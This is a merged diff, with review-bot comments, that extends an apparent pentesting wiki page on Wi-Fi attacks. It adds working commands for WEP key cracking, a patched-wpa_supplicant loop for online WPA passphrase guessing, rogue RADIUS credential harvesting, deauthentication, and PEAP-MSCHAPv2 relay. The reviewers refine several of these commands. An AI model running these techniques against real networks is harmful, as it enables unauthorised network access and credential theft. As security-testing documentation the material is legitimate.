Merged
Expand Up @@ -108,6 +108,26 @@ This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically:
- **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks
- **+ WPA** -- Useful to capture WPA handshakes

## Open / OWE networks quick notes

- **Passive capture** on open SSIDs still works with monitor mode and tcpdump:

```bash
iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap
```

- **OWE** (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so air frames are encrypted even on "open" SSIDs. Being WPA3-based, it also enforces **802.11w PMF**, which blocks spoofed deauth/disassoc frames.
- OWE **does not authenticate** joiners: anyone can associate, so **verify client isolation** instead of trusting marketing claims. Without isolation, ARP spoofing or responder-style poisoning on the local L2 still works.
- **Evil Twin** remains feasible on open/OWE SSIDs by presenting a stronger signal; PMF just removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is regained.
- Broadcast poisoning on open guest Wi-Fi easily yields creds/hashes (LLMNR/NBT-NS/mDNS). See:

{{#ref}}
../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
{{#endref}}

## DOS

### Deauthentication Packets
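Review bot: the passive-capture snippet will fail on most drivers as written, because `iw wlan0 set type monitor` only succeeds while the link is down; insert `ip link set wlan0 down` before the `set type monitor` line and keep the `ip link set wlan0 up` that follows. Two wording points in the same hunk: the capture bullet should say that on an OWE SSID the same capture yields only encrypted data frames (management frames stay visible), which is what the next bullet is getting at; and the "verify client isolation" bullet would be more useful if it named the check itself (confirm two associated stations cannot reach each other at L2) rather than only the spoofing that works when isolation is missing.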
Expand Down Expand Up @@ -283,7 +303,22 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_

## **WEP**

So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
**Why it collapses**

- RC4 seed is just **IV (24 bits) + shared key**. The IV is cleartext, tiny (2^24), and repeats quickly, so ciphertexts with the same IV reuse the keystream.
- XORing two ciphertexts with the same keystream leaks `PlaintextA ⊕ PlaintextB`; predictable headers + RC4 KSA biases (**FMS**) let you “vote” key bytes. **PTW** optimises this using ARP traffic to drop requirements to tens of thousands of packets instead of millions.
- Integrity is only **CRC32** (linear/unkeyed), so an attacker can flip bits and recompute CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs.

Practical break is deterministic:

```bash
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap # PTW attack recovers key once IV threshold is met
```

Airgeddon still ships an "All-in-One" WEP workflow if you prefer a guided UI.

![](<../../images/image (432).png>)

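Review bot: the sentence left at the top of the WEP section ("So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One"...") now duplicates the new closing line about the Airgeddon All-in-One workflow and carries two typos (`nowdays` -> `nowadays`, `have` -> `has`); drop it or fold it into the closing sentence. The cryptographic summary is accurate; one nit on the command block: the comment `# PTW attack recovers key once IV threshold is met` leaves the threshold unexplained, while the bullet above says PTW depends on ARP traffic, so the `aireplay-ng --arpreplay` comment should say that ARP replay is what makes that threshold reachable quickly, and that a capture with few ARP frames falls back to the slower FMS-style requirement.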
Expand Down Expand Up @@ -402,6 +437,36 @@ apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze
```

#### Faster online PSK guessing via `wpa_supplicant` ctrl socket (no clients/PMKID)

When no clients are around and the AP refuses PMKID, you can iterate PSKs online without respawning supplicants:

- Patch `wpa_supplicant.c` to force `dur = 0;` in the auth failure backoff logic (around `ssid->auth_failures`), effectively disabling the temporary-disable timer.
- Run a single daemon with a control socket:

```bash
# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf
```

- Drive it via the control interface, reusing the same scan and network:

```text
ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED
```

A small Python loop reading socket events (`CTRL-EVENT-CONNECTED` / `CTRL-EVENT-DISCONNECTED`) can test ~100 guesses in ~5 minutes without scan overhead. It is still noisy and detectable, but avoids per-attempt process restarts and backoff delays.

## **WPA Enterprise (MGT)**

In **enterprise WiFi setups, you'll encounter various authentication methods**, each providing different security levels and management features. When you use tools like `airodump-ng` to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include:
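Review bot: the control-interface loop (`SET_NETWORK 0 psk "<candidate>"` followed by `REASSOCIATE`) needs a guard for candidates that are not valid WPA passphrases: wpa_supplicant answers `FAIL` to a quoted psk shorter than 8 or longer than 63 characters, so the Python loop should check the `SET_NETWORK` reply and skip those instead of waiting for a `CTRL-EVENT-DISCONNECTED` that never arrives. The patch instruction ("force `dur = 0;` ... around `ssid->auth_failures`") should name the function that computes that backoff, `wpas_auth_failed()` in `wpa_supplicant/wpa_supplicant.c`, and the version it was tested against, since that code moves between releases. The first fenced block mixes a config file and a shell command under one `bash` fence; split it into a `wpa_supplicant.conf` block and the `wpa_supplicant -B ...` command. Finally, "noisy and detectable" could be made concrete: every iteration is a full association followed by a failed 4-way handshake from the same station MAC, which is exactly the pattern AP and WIDS logs flag.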
Expand Down Expand Up @@ -714,6 +779,16 @@ Or you could also use:
- `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` to specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect).
- [Find more info in the wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)

#### When clients skip RADIUS certificate validation (PEAP/TTLS)

- If devices are configured with "do not validate certificate", a cloned AP + rogue RADIUS (`eaphammer --cert-wizard --creds --auth wpa-eap`) will collect **NetNTLMv2** (PEAP-MSCHAPv2) or **cleartext** creds (PEAP-GTC). `bettercap` deauth (`wifi.deauth <BSSID>`) both reveals hidden SSIDs during probes and forces reconnects, unless PMF/802.11w blocks spoofed deauth.
- Cracked NetNTLMv2 gives reusable Wi‑Fi/AD creds; GTC yields immediate plaintext.

#### Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana)

- For machine accounts with uncrackable random passwords, abuse **MSCHAPv2 relay**: run `hostapd-mana` as the Evil Twin, forwarding the MSCHAPv2 exchange to `wpa_sycophant`, which simultaneously connects to the legitimate AP. Successful relay grants authenticated Wi‑Fi without recovering the password.
- Use builds that support the target security level (WPA3/PMF requires recent hostapd/wpa_supplicant); PMF prevents deauth coercion, so wait for voluntary client associations.

**Using Airgeddon**

`Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
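Review bot: the one-liner `eaphammer --cert-wizard --creds --auth wpa-eap` conflates two separate eaphammer invocations: `--cert-wizard` is its own mode that generates the RADIUS certificate and exits, and the credential-harvesting run is a second command that also needs an interface and ESSID (`eaphammer -i <iface> --essid <ssid> --auth wpa-eap --creds`); split them. Since the heading is "When clients skip RADIUS certificate validation", the bullets should also state the control that closes both this and the relay subsection below it: enforcing server-certificate validation in the supplicant profile (pinned RADIUS CA and server name) or moving to EAP-TLS, which stops the client from ever completing the tunnel with the rogue RADIUS, making the PMF caveat secondary.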
Expand Down Expand Up @@ -851,6 +926,8 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti
- [The vulnerability that killed FreeWifi_Secure](https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/)
- [RFC 4186 – EAP-SIM Authentication](https://datatracker.ietf.org/doc/html/rfc4186)
- [3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses](https://www.3gpp.org/ftp/Specs/archive/33_series/33.402/)
- [Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 (Synacktiv)](https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html)
- [PEAP relay attacks with wpa_sycophant (SensePost)](https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/)


TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
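Review bot: the two references added here (the Synacktiv "Wireless-(in)Fidelity" article and the SensePost wpa_sycophant post) appear to be the sources for the new wpa_supplicant control-socket and PEAP-relay sections, but neither section links to them inline; add a citation from each section so readers can find the original write-up. Visible in the same hunk but outside the diff: the trailing TODO line still mixes Spanish ("login con facebook e imitacionde WPA en captive portals"); translate it or drop it.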